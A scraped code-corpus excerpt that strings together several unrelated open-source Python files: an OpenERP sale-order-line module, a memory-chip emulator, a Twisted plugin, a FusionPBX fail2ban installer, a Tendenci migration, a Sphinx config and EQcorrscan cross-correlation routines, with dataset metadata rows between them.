context = {}
if context.get("uid"):
if uid != context.get("uid",False):
uid = context.get("uid")
context = dict(context)
uom_obj = self.pool.get("product.uom")
loc_obj = self.pool.get("stock.location")
move_obj = self.pool.get("stock.move")
sale_obj = self.pool.get("sale.order")
prod_obj = self.pool.get("product.product")
tax_obj = self.pool.get("account.tax")
order_id = vals.get('order_id')
case = sale_obj.browse(cr, uid,order_id )
company_id = case.warehouse_id.company_id.id
res = self.product_id_change_with_wh(cr, uid, [], case.pricelist_id.id,vals.get('product_id',False),vals.get('qty',0), vals.get('uom',False), vals.get('qty_uos',0),
vals.get('uos',False), vals.get('name',''), case.partner_id.id, vals.get('lang',False), vals.get('update_tax',True), vals.get('date_order',False),
vals.get('packaging',False), vals.get('fiscal_position',False), vals.get('flag',False),warehouse_id=case.warehouse_id.id,context=context)['value']
prod_uom = case.product_id.uom_id.id
line_uom = vals.get('product_uom')
# For Case of UOM
if prod_uom != line_uom:
uom = uom_obj.browse(cr, uid, vals.get('product_uom'))
if uom.factor:
vals.update({
'price_unit' : float(res.get('price_unit')) / float(uom.factor)
})
if case.warehouse_id: # shop is nothing but company_id
context.update({'warehouse':case.warehouse_id.id})
# Commented for Pricelist Concept
if res.get('discount'):
vals.update({
'discount' : res.get('discount') and res.get('discount') or 0.00,
})
if res.get('price_unit') and prod_uom == line_uom:
vals.update({
'price_unit' : res.get('price_unit') and res.get('price_unit') or 0.00,
})
if res.get("price_unit") and prod_uom == line_uom:
vals.update({'price_unit':res.get("price_unit")})
if not vals.get('price_unit')or not res.get('price_unit'):
raise osv.except_osv(_('Warning'), _('Please Enter The Unit Price For \'%s\'.') % (vals['name'],))
location_ids = loc_obj.search(cr, uid,[('company_id','=', company_id),('name','=','Stock')])
comp_id = vals.get("company_id",case.company_id)
if res.get("tax_id"):
tax = tax_obj.browse(cr, uid, res.get("tax_id"))
for t in tax:
if t.company_id.id == comp_id.id:
vals.update({
'tax_id' : [(6, 0, [t.id])],
})
if location_ids:
location_ids = location_ids[0]
product = vals.get('product_id', False)
available_qty = prod_obj._product_available(cr, uid, [product], None, False, context)
available_qty = available_qty[product].get('qty_available',0)
prod = prod_obj.browse(cr, uid, vals.get("product_id",False))
vals.update({'available_qty' : available_qty and available_qty or 0,
'product_image':prod.image_medium,
'sale_mrp':prod.lst_price})
return super(sale_order_line, self).create(cr, uid, vals, context=context)
def write(self, cr, uid, ids, vals, context=None):
if not context:
context = {}
if context and uid != context.get("uid",False):
uid = context.get("uid")
if not uid:
uid = SUPERUSER_ID
context = dict(context)
prodtemp_obj = self.pool.get("product.template")
loc_obj = self.pool.get("stock.location")
move_obj = self.pool.get("stock.move")
prod_obj = self.pool.get("product.product")
tax_obj = self.pool.get("account.tax")
user_obj = self.pool.get("res.users")
uom_obj = self.pool.get("product.uom")
for case in self.browse(cr, uid, ids):
price_unit = vals.get('price_unit')
prod_id = vals.get("product_id", case.product_id.id)
prod = prod_obj.browse(cr, uid, [prod_id])
# prodtemp_id = prod_obj.browse(cr, uid,[prod.product_tmpl_id.id] )
pricelist_id = case.order_id.pricelist_id.id
context.update({'quantity':case.product_uom_qty or 1.0 })
context.update({'pricelist': pricelist_id or False})
context.update({'partner': case.order_id.partner_id.id or False})
# Calling This method update price_unit as Pricelist Price or Price After Discount or Sales Price
prodtemp = prodtemp_obj._product_template_price(cr, uid, [prod.product_tmpl_id.id], 'price', False, context=context)
price_unit = prodtemp[prod.product_tmpl_id.id]
if price_unit <=0.00 and not prod.type == 'service':
raise osv.except_osv(_('Warning'), _('Please Enter The Unit Price For \'%s\'.') % (case.name))
if not price_unit:
price_unit = case.price_unit
if price_unit <= 0.00 and not prod.type == 'service':
raise osv.except_osv(_('Warning'), _('Please Enter The Unit Price For \'%s\'.') % (case.name))
if price_unit:
vals.update({
'price_unit':price_unit
})
if vals.get('warehouse_id',case.order_id.warehouse_id.id): # shop is nothing but company_id
context.update({'warehouse':vals.get('warehouse_id',case.order_id.warehouse_id.id)})
product = vals.get('product_id', case.product_id.id)
available_qty = prod_obj._product_available(cr, uid, [product], None, False, context)
available_qty = available_qty[product].get('qty_available',0)
prod = prod_obj.browse(cr, uid,[product])
vals.update({
'available_qty' : available_qty,
'product_image':prod.image_medium,
'sale_mrp':prod.lst_price
})
res = self.product_id_change_with_wh(cr, uid, [], case.order_id.pricelist_id.id,vals.get('product_id',case.product_id.id),vals.get('qty',0), vals.get('uom',case.product_uom.id), vals.get('qty_uos',0),
vals.get('uos',False), vals.get('name',''), case.order_id.partner_id.id, vals.get('lang',False), vals.get('update_tax',True), vals.get('date_order',False),
vals.get('packaging',False), vals.get('fiscal_position',False), vals.get('flag',False),warehouse_id=case.order_id.warehouse_id.id,context=context)['value']
# For Case of UOM
prod_uom = prod.uom_id.id
line_uom = vals.get('product_uom',case.product_uom.id)
if prod_uom != line_uom:
uom = uom_obj.browse(cr, uid, line_uom)
if uom.factor:
vals.update({
'price_unit' : float(res.get('price_unit')) / float(uom.factor),
'available_qty' : available_qty,
# Commented for Pricelist Concept
'discount' : res.get('discount') and res.get('discount') or 0,
})
if prod_uom == line_uom:
vals.update({
'available_qty' : available_qty,
# Commented for Pricelist Concept
'discount' : res.get('discount') and res.get('discount') or 0,
'price_unit': res.get("price_unit") and res.get("price_unit") or 1
})
if res.get("tax_id"):
comp_id = vals.get("company_id",case.company_id.id)
if res.get("company_id"):
comp_id = res.get("company_id", case.company_id)
tax = tax_obj.browse(cr, uid, res.get("tax_id"))
for t in tax:
if t.company_id.id == comp_id:
vals.update({
'tax_id' : [(6, 0, [t.id])],
})
return super(sale_order_line, self).write(cr, uid, [case.id], vals, context=context)
sale_order_line()
| agpl-3.0 | -6,004,310,348,129,873,000 | 47.130389 | 337 | 0.514135 | false | 3.985372 | false | false | false |
BenProjex/ArchProject | chip/Memory.py | 1 | 2024 |
#!/usr/bin/python
WRITE = 1
READ = 0
###########################################################
# Chip is a small helper class; only Memory below uses it #
###########################################################
class Chip:
def __init__(self,name):
self.data = [0]*(2**12)
self.name =name;
#rdOrwr: 0 for read and 1 for write
def read8bit(self,address,data):
print("read data at chip: ",self.name," address [$", address,"] = $", self.data[address],".");
return self.data[address]
def write8bit(self,address,data):
print("Write $",data," to chip: ",self.name," address [$", address,"].");
self.data[address] = data
###############################################################
#The Memory class works like the machine's memory: it stores #
#the instruction pointer and data.                            #
#Call the memoryOp function to read or write data in memory.
#
#example:
#m = Memory()
#m.memoryOp(4096,34,1)     #memoryOp(address,data,rdOrwr)
#rdOrwr(1bit) = 1 means write to memory
#this call writes data(8bit) = 34 to address(16bit) = 4096
#
#m.memoryOp(4096,34,0)     #memoryOp(address,data,rdOrwr)
#rdOrwr(1bit) = 0 means read from memory
#notice: the data parameter is not used for a read.
#this call reads from memory address(16bit) = 4096 and returns#
#data(8bit)                                                   #
################################################################
class Memory:
def __init__(self):
    self.chip = [Chip("U" + str(200+i)) for i in range(16)]  # 16 chips x 4K = full 64K address space (chipselect 0-15)
def memoryOp(self,address,data,rdOrwr):
if(address<=65535):
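      # Decode the 16-bit address: the upper 4 bits select one of the 4K chips
      # and the lower 12 bits are the offset within that chip.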
chipselect = address >> 12
chipaddr = address & 4095
if rdOrwr == WRITE:
self.chip[chipselect].write8bit(chipaddr,data)
elif rdOrwr == READ:
return self.chip[chipselect].read8bit(chipaddr,data)
else:
return None
else:
raise Exception('the address is overflow')
#temp = Memory();
#temp.memoryOp(5000,300,WRITE);
#print(temp.memoryOp(5000,300,READ)); | gpl-3.0 | -5,691,190,682,838,375,000 | 34.526316 | 98 | 0.551877 | false | 3.601423 | false | false | false |
dr4ke616/pinky | twisted/plugins/node.py | 1 | 1334 | from zope.interface import implements
from twisted.python import usage
from twisted.plugin import IPlugin
from twisted.application.service import IServiceMaker
from pinky.node.service import NodeService
class Options(usage.Options):
optParameters = [
['port', None, None, 'The port number to listen on.'],
['host', None, None, 'The host address to bind to.'],
['broker_host', 'h', None, 'The broker host to connect to.'],
['broker_port', 'p', 43435, 'The broker port to connect to.']
]
optFlags = [
['debug', 'b', 'Enable/disable debug mode.']
]
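# Illustrative invocation (host/port values are placeholders): once installed as
# a twistd plugin, the service can be started with e.g.
#   twistd -n node --host=0.0.0.0 --port=8888 --broker_host=127.0.0.1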
class NodeServiceMaker(object):
implements(IServiceMaker, IPlugin)
tapname = "node"
description = "Startup an instance of the Pinky node"
options = Options
def makeService(self, options):
""" Construct a Node Server
"""
return NodeService(
port=options['port'],
host=options['host'],
broker_host=options['broker_host'],
broker_port=options['broker_port'],
debug=options['debug']
)
# Now construct an object which *provides* the relevant interfaces
# The name of this variable is irrelevant, as long as there is *some*
# name bound to a provider of IPlugin and IServiceMaker.
serviceMaker = NodeServiceMaker()
| mit | -2,104,320,416,493,700,000 | 28.644444 | 69 | 0.646927 | false | 4.006006 | false | false | false |
jordanrinke/fusionpbx-installer | installers/fail2ban.py | 1 | 2492 | import shutil
import subprocess
import sys
import os
"""
FusionPBX
Version: MPL 1.1
The contents of this file are subject to the Mozilla Public License Version
1.1 (the "License"); you may not use this file except in compliance with
the License. You may obtain a copy of the License at
http://www.mozilla.org/MPL/
Software distributed under the License is distributed on an "AS IS" basis,
WITHOUT WARRANTY OF ANY KIND, either express or implied. See the License
for the specific language governing rights and limitations under the
License.
The Initial Developer of the Original Code is
Jim Millard <[email protected]>
Portions created by the Initial Developer are Copyright (C) 2008-2016
the Initial Developer. All Rights Reserved.
Contributor(s):
Mark J. Crane <[email protected]>
"""
def ifail2ban(fpbxparms):
INSTALL_ROOT = os.getcwd()
if os.path.isfile("%s/resources/install.json" % (INSTALL_ROOT)):
fpbxparms.PARMS = fpbxparms.load_parms(fpbxparms.PARMS)
else:
print("Error no install parameters")
sys.exit(1)
print("Setting up fail2ban to protect your system from some types of attacks")
if os.path.isfile("%s/resources/fail2ban/jail.local" % (INSTALL_ROOT)):
if fpbxparms.whitelist != '':
shutil.copyfile("%s/resources/fail2ban/jail.package" %
(INSTALL_ROOT), "/etc/fail2ban/jail.local")
else:
shutil.copyfile("%s/resources/fail2ban/jail.source" %
(INSTALL_ROOT), "/etc/fail2ban/jail.local")
shutil.copyfile("%s/resources/fail2ban/freeswitch-dos.conf" %
(INSTALL_ROOT), "/etc/fail2ban/filter.d/freeswitch-dos.conf")
shutil.copyfile("%s/resources/fail2ban/fusionpbx.conf" %
(INSTALL_ROOT), "/etc/fail2ban/filter.d/fusionpbx.conf")
if fpbxparms.PARMS["FS_Install_Type"][0] == "P":
ftb = open("/etc/fail2ban/jail.local", 'a')
ftb.write("[DEFAULT]")
ftb.write("\n")
ftb.write("ignoreip = %s" % (fpbxparms.whitelist))
ftb.write("\n")
ftb.close()
ret = subprocess.call("systemctl restart fail2ban",
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, shell=True)
fpbxparms.check_ret(ret, "Restart fail2ban")
return
| mit | 6,252,150,104,698,604,000 | 39.852459 | 99 | 0.620385 | false | 3.827957 | false | false | false |
alirizakeles/tendenci | tendenci/apps/invoices/management/commands/update_inv_tb.py | 1 | 4500 | from django.core.management.base import BaseCommand, CommandError
class Command(BaseCommand):
def handle(self, *args, **options):
# command to run: python manage.py update_inv_tb
"""
This command will:
1) add the object_type field
2) populate the object_type field based on the content in invoice_object_type
3) drop field invoice_object_type
4) rename field invoice_object_type_id to object_id
"""
from django.db import connection, transaction
from django.contrib.contenttypes.models import ContentType
cursor = connection.cursor()
# add the object_type field
cursor.execute("ALTER TABLE invoices_invoice ADD object_type_id int AFTER guid")
transaction.commit_unless_managed()
print "Field object_type_id - Added"
# assign content type to object_type based on the invoice_object_type
try:
ct_make_payment = ContentType.objects.get(app_label='make_payments', model='MakePayment')
except:
ct_make_payment = None
try:
ct_donation = ContentType.objects.get(app_label='donations', model='Donation')
except:
ct_donation = None
try:
ct_job = ContentType.objects.get(app_label='jobs', model='Job')
except:
ct_job = None
try:
ct_directory = ContentType.objects.get(app_label='directories', model='Directory')
except:
ct_directory = None
try:
ct_event_registration = ContentType.objects.get(app_label='events', model='Registration')
except:
ct_event_registration = None
try:
ct_corp_memb = ContentType.objects.get(app_label='corporate_memberships', model='CorporateMembership')
except:
ct_corp_memb = None
if ct_make_payment:
cursor.execute("""UPDATE invoices_invoice
SET object_type_id=%s
WHERE (invoice_object_type='make_payment'
OR invoice_object_type='makepayments') """, [ct_make_payment.id])
transaction.commit_unless_managed()
if ct_donation:
cursor.execute("""UPDATE invoices_invoice
SET object_type_id=%s
WHERE (invoice_object_type='donation'
OR invoice_object_type='donations') """, [ct_donation.id])
transaction.commit_unless_managed()
if ct_job:
cursor.execute("""UPDATE invoices_invoice
SET object_type_id=%s
WHERE (invoice_object_type='job'
OR invoice_object_type='jobs') """, [ct_job.id])
transaction.commit_unless_managed()
if ct_directory:
cursor.execute("""UPDATE invoices_invoice
SET object_type_id=%s
WHERE (invoice_object_type='directory'
OR invoice_object_type='directories') """, [ct_directory.id])
transaction.commit_unless_managed()
if ct_event_registration:
cursor.execute("""UPDATE invoices_invoice
SET object_type_id=%s
WHERE (invoice_object_type='event_registration'
OR invoice_object_type='calendarevents') """, [ct_event_registration.id])
if ct_corp_memb:
cursor.execute("""UPDATE invoices_invoice
SET object_type_id=%s
WHERE (invoice_object_type='corporate_membership'
OR invoice_object_type='corporatememberships') """, [ct_corp_memb.id])
transaction.commit_unless_managed()
print "Field object_type_id - Populated"
# drop field invoice_object_type
cursor.execute("ALTER TABLE invoices_invoice DROP invoice_object_type")
transaction.commit_unless_managed()
print "Field invoice_object_type - Dropped"
# rename invoice_object_type_id to object_id
cursor.execute("ALTER TABLE invoices_invoice CHANGE invoice_object_type_id object_id int")
transaction.commit_unless_managed()
print "Renamed invoice_object_type to object_id"
print "done" | gpl-3.0 | 5,166,609,565,698,706,000 | 43.564356 | 114 | 0.560667 | false | 4.672897 | false | false | false |
QuantumGhost/factory_boy | docs/conf.py | 1 | 8502 | # -*- coding: utf-8 -*-
#
# Factory Boy documentation build configuration file, created by
# sphinx-quickstart on Thu Sep 15 23:51:15 2011.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
sys.path.insert(0, os.path.dirname(os.path.abspath('.')))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.extlinks',
'sphinx.ext.intersphinx',
'sphinx.ext.viewcode',
]
extlinks = {
'issue': ('https://github.com/FactoryBoy/factory_boy/issues/%s', 'issue #'),
}
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Factory Boy'
copyright = u'2011-2015, Raphaël Barrois, Mark Sandstrom'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
root = os.path.abspath(os.path.dirname(__file__))
def get_version(*module_dir_components):
import re
version_re = re.compile(r"^__version__ = ['\"](.*)['\"]$")
module_root = os.path.join(root, os.pardir, *module_dir_components)
module_init = os.path.join(module_root, '__init__.py')
with open(module_init, 'r') as f:
for line in f:
match = version_re.match(line[:-1])
if match:
return match.groups()[0]
return '0.1.0'
# The full version, including alpha/beta/rc tags.
release = get_version('factory')
# The short X.Y version.
version = '.'.join(release.split('.')[:2])
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'sphinx_rtd_theme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
if 'READTHEDOCS_VERSION' in os.environ:
# Use the readthedocs version string in preference to our known version.
html_title = u"{} {} documentation".format(
project, os.environ['READTHEDOCS_VERSION'])
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'FactoryBoydoc'
# -- Options for LaTeX output --------------------------------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'FactoryBoy.tex', u'Factory Boy Documentation',
u'Raphaël Barrois, Mark Sandstrom', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'factoryboy', u'Factory Boy Documentation',
[u'Raphaël Barrois, Mark Sandstrom'], 1)
]
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {
'http://docs.python.org/': None,
'django': (
'http://docs.djangoproject.com/en/dev/',
'http://docs.djangoproject.com/en/dev/_objects/',
),
'sqlalchemy': (
'http://docs.sqlalchemy.org/en/rel_0_9/',
'http://docs.sqlalchemy.org/en/rel_0_9/objects.inv',
),
}
| mit | -6,028,333,616,958,771,000 | 32.070039 | 80 | 0.693729 | false | 3.635158 | true | false | false |
eqcorrscan/ci.testing | eqcorrscan/utils/correlate.py | 1 | 12024 | """
Correlation functions for multi-channel cross-correlation of seismic data.
:copyright:
EQcorrscan developers.
:license:
GNU Lesser General Public License, Version 3
(https://www.gnu.org/copyleft/lesser.html)
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import numpy as np
import ctypes
from multiprocessing import Pool
from scipy.fftpack.helper import next_fast_len
from eqcorrscan.utils.libnames import _load_cdll
def scipy_normxcorr(templates, stream, pads):
"""
Compute the normalized cross-correlation of multiple templates with data.
:param templates: 2D Array of templates
:type templates: np.ndarray
:param stream: 1D array of continuous data
:type stream: np.ndarray
:param pads: List of ints of pad lengths in the same order as templates
:type pads: list
:return: np.ndarray of cross-correlations
:return: np.ndarray channels used
"""
import bottleneck
from scipy.signal.signaltools import _centered
# Generate a template mask
used_chans = ~np.isnan(templates).any(axis=1)
# Currently have to use float64 as bottleneck runs into issues with other
# types: https://github.com/kwgoodman/bottleneck/issues/164
stream = stream.astype(np.float64)
templates = templates.astype(np.float64)
template_length = templates.shape[1]
stream_length = len(stream)
fftshape = next_fast_len(template_length + stream_length - 1)
# Set up normalizers
stream_mean_array = bottleneck.move_mean(
stream, template_length)[template_length - 1:]
stream_std_array = bottleneck.move_std(
stream, template_length)[template_length - 1:]
# Normalize and flip the templates
norm = ((templates - templates.mean(axis=-1, keepdims=True)) / (
templates.std(axis=-1, keepdims=True) * template_length))
norm_sum = norm.sum(axis=-1, keepdims=True)
stream_fft = np.fft.rfft(stream, fftshape)
template_fft = np.fft.rfft(np.flip(norm, axis=-1), fftshape, axis=-1)
res = np.fft.irfft(template_fft * stream_fft,
fftshape)[:, 0:template_length + stream_length - 1]
res = ((_centered(res, stream_length - template_length + 1)) -
norm_sum * stream_mean_array) / stream_std_array
res[np.isnan(res)] = 0.0
for i in range(len(pads)):
res[i] = np.append(res[i], np.zeros(pads[i]))[pads[i]:]
return res.astype(np.float32), used_chans
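# Hypothetical usage sketch (not part of the original module): templates are
# stacked row-wise into a 2D float array, the stream is 1D, and pads holds one
# integer offset per template row; the shapes below are assumptions for
# illustration only.
# templates = np.random.randn(2, 200)
# stream = np.random.randn(86400)
# ccc, used_chans = scipy_normxcorr(templates, stream, pads=[0, 0])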
def multichannel_xcorr(templates, stream, cores=1, time_domain=False):
"""
Cross-correlate multiple channels either in parallel or not
:type templates: list
:param templates:
A list of templates, where each one should be an obspy.Stream object
containing multiple traces of seismic data and the relevant header
information.
:type stream: obspy.core.stream.Stream
:param stream:
A single Stream object to be correlated with the templates.
    :type cores: int
    :param cores:
        Number of processes to use; if set to None, no multiprocessing
        will be done.
:type time_domain: bool
:param time_domain:
Whether to compute in the time-domain using the compiled openMP
parallel cross-correlation routine.
:returns:
New list of :class:`numpy.ndarray` objects. These will contain
the correlation sums for each template for this day of data.
:rtype: list
:returns:
list of ints as number of channels used for each cross-correlation.
:rtype: list
:returns:
list of list of tuples of station, channel for all cross-correlations.
:rtype: list
.. Note::
Each template must contain the same channels as every other template,
the stream must also contain the same channels (note that if there
are duplicate channels in the template you do not need duplicate
channels in the stream).
"""
no_chans = np.zeros(len(templates))
chans = [[] for _i in range(len(templates))]
# Do some reshaping
stream.sort(['network', 'station', 'location', 'channel'])
t_starts = []
for template in templates:
template.sort(['network', 'station', 'location', 'channel'])
t_starts.append(min([tr.stats.starttime for tr in template]))
seed_ids = [tr.id + '_' + str(i) for i, tr in enumerate(templates[0])]
template_array = {}
stream_array = {}
pad_array = {}
for i, seed_id in enumerate(seed_ids):
t_ar = np.array([template[i].data
for template in templates]).astype(np.float32)
template_array.update({seed_id: t_ar})
stream_array.update(
{seed_id: stream.select(
id=seed_id.split('_')[0])[0].data.astype(np.float32)})
pad_list = [
int(round(template[i].stats.sampling_rate *
(template[i].stats.starttime - t_starts[j])))
for j, template in zip(range(len(templates)), templates)]
pad_array.update({seed_id: pad_list})
if cores is None:
cccsums = np.zeros([len(templates),
len(stream[0]) - len(templates[0][0]) + 1])
for seed_id in seed_ids:
if time_domain:
tr_xcorrs, tr_chans = time_multi_normxcorr(
templates=template_array[seed_id],
stream=stream_array[seed_id], pads=pad_array[seed_id])
else:
tr_xcorrs, tr_chans = fftw_xcorr(
templates=template_array[seed_id],
stream=stream_array[seed_id], pads=pad_array[seed_id])
cccsums = np.sum([cccsums, tr_xcorrs], axis=0)
no_chans += tr_chans.astype(np.int)
for chan, state in zip(chans, tr_chans):
if state:
chan.append((seed_id.split('.')[1],
seed_id.split('.')[-1].split('_')[0]))
else:
pool = Pool(processes=cores)
if time_domain:
results = [pool.apply_async(time_multi_normxcorr, (
template_array[seed_id], stream_array[seed_id],
pad_array[seed_id])) for seed_id in seed_ids]
else:
results = [pool.apply_async(fftw_xcorr, (
template_array[seed_id], stream_array[seed_id],
pad_array[seed_id])) for seed_id in seed_ids]
pool.close()
results = [p.get() for p in results]
xcorrs = [p[0] for p in results]
tr_chans = np.array([p[1] for p in results])
pool.join()
cccsums = np.sum(xcorrs, axis=0)
no_chans = np.sum(tr_chans.astype(np.int), axis=0)
for seed_id, tr_chan in zip(seed_ids, tr_chans):
for chan, state in zip(chans, tr_chan):
if state:
chan.append((seed_id.split('.')[1],
seed_id.split('.')[-1].split('_')[0]))
return cccsums, no_chans, chans
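# Hypothetical usage sketch (names assumed, not in the original module):
# `template_streams` is a list of obspy Stream objects sharing the same
# channel layout and `st` is the continuous data Stream to scan.
# cccsums, no_chans, chans = multichannel_xcorr(template_streams, st, cores=4)
# Each row of cccsums is then the stacked correlation sum for one template.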
def time_multi_normxcorr(templates, stream, pads):
"""
Compute cross-correlations in the time-domain using C routine.
:param templates: 2D Array of templates
:type templates: np.ndarray
:param stream: 1D array of continuous data
:type stream: np.ndarray
:param pads: List of ints of pad lengths in the same order as templates
:type pads: list
:return: np.ndarray of cross-correlations
:return: np.ndarray channels used
"""
from future.utils import native_str
used_chans = ~np.isnan(templates).any(axis=1)
utilslib = _load_cdll('libutils')
utilslib.multi_corr.argtypes = [
np.ctypeslib.ndpointer(dtype=np.float32, ndim=1,
flags=native_str('C_CONTIGUOUS')),
ctypes.c_int, ctypes.c_int,
np.ctypeslib.ndpointer(dtype=np.float32, ndim=1,
flags=native_str('C_CONTIGUOUS')),
ctypes.c_int,
np.ctypeslib.ndpointer(dtype=np.float32, ndim=1,
flags=native_str('C_CONTIGUOUS'))]
utilslib.multi_corr.restype = ctypes.c_int
template_len = templates.shape[1]
n_templates = templates.shape[0]
image_len = stream.shape[0]
ccc = np.ascontiguousarray(
np.empty((image_len - template_len + 1) * n_templates), np.float32)
t_array = np.ascontiguousarray(templates.flatten(), np.float32)
utilslib.multi_corr(t_array, template_len, n_templates,
np.ascontiguousarray(stream, np.float32), image_len,
ccc)
ccc[np.isnan(ccc)] = 0.0
ccc = ccc.reshape((n_templates, image_len - template_len + 1))
for i in range(len(pads)):
ccc[i] = np.append(ccc[i], np.zeros(pads[i]))[pads[i]:]
return ccc, used_chans
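# Hypothetical note (not in the original module): time_multi_normxcorr mirrors
# the scipy_normxcorr interface but runs the compiled time-domain C routine,
# e.g. ccc, used_chans = time_multi_normxcorr(templates, stream, pads=[0, 0])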
def fftw_xcorr(templates, stream, pads):
"""
Normalised cross-correlation using the fftw library.
    Internally this function uses double precision numbers, which is
    required for seismic data. Cross-correlations are computed as the
inverse fft of the dot product of the ffts of the stream and the reversed,
normalised, templates. The cross-correlation is then normalised using the
running mean and standard deviation (not using the N-1 correction) of the
stream and the sums of the normalised templates.
    This Python function wraps the C library written by C. Chamberlain for this
    purpose.
:param templates: 2D Array of templates
:type templates: np.ndarray
:param stream: 1D array of continuous data
:type stream: np.ndarray
:param pads: List of ints of pad lengths in the same order as templates
:type pads: list
:return: np.ndarray of cross-correlations
:return: np.ndarray channels used
"""
from future.utils import native_str
utilslib = _load_cdll('libutils')
utilslib.normxcorr_fftw_1d.argtypes = [
np.ctypeslib.ndpointer(dtype=np.float32, ndim=1,
flags=native_str('C_CONTIGUOUS')),
ctypes.c_int,
np.ctypeslib.ndpointer(dtype=np.float32, ndim=1,
flags=native_str('C_CONTIGUOUS')),
ctypes.c_int,
np.ctypeslib.ndpointer(dtype=np.float32, ndim=1,
flags=native_str('C_CONTIGUOUS')),
ctypes.c_int]
utilslib.normxcorr_fftw_1d.restype = ctypes.c_int
# Generate a template mask
used_chans = ~np.isnan(templates).any(axis=1)
template_length = templates.shape[1]
stream_length = len(stream)
n_templates = templates.shape[0]
fftshape = next_fast_len(template_length + stream_length - 1)
    # Normalize the templates
norm = ((templates - templates.mean(axis=-1, keepdims=True)) / (
templates.std(axis=-1, keepdims=True) * template_length))
ccc = np.empty((n_templates, stream_length - template_length + 1),
np.float32)
for i in range(n_templates):
if np.all(np.isnan(norm[i])):
ccc[i] = np.zeros(stream_length - template_length + 1)
else:
ret = utilslib.normxcorr_fftw_1d(
np.ascontiguousarray(norm[i], np.float32), template_length,
np.ascontiguousarray(stream, np.float32), stream_length,
np.ascontiguousarray(ccc[i], np.float32), fftshape)
if ret != 0:
raise MemoryError()
ccc = ccc.reshape((n_templates, stream_length - template_length + 1))
ccc[np.isnan(ccc)] = 0.0
if np.any(np.abs(ccc) > 1.01):
print('Normalisation error in C code')
print(ccc.max())
print(ccc.min())
raise MemoryError()
ccc[ccc > 1.0] = 1.0
ccc[ccc < -1.0] = -1.0
for i in range(len(pads)):
ccc[i] = np.append(ccc[i], np.zeros(pads[i]))[pads[i]:]
return ccc, used_chans
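# Hypothetical usage sketch (not in the original module): fftw_xcorr accepts
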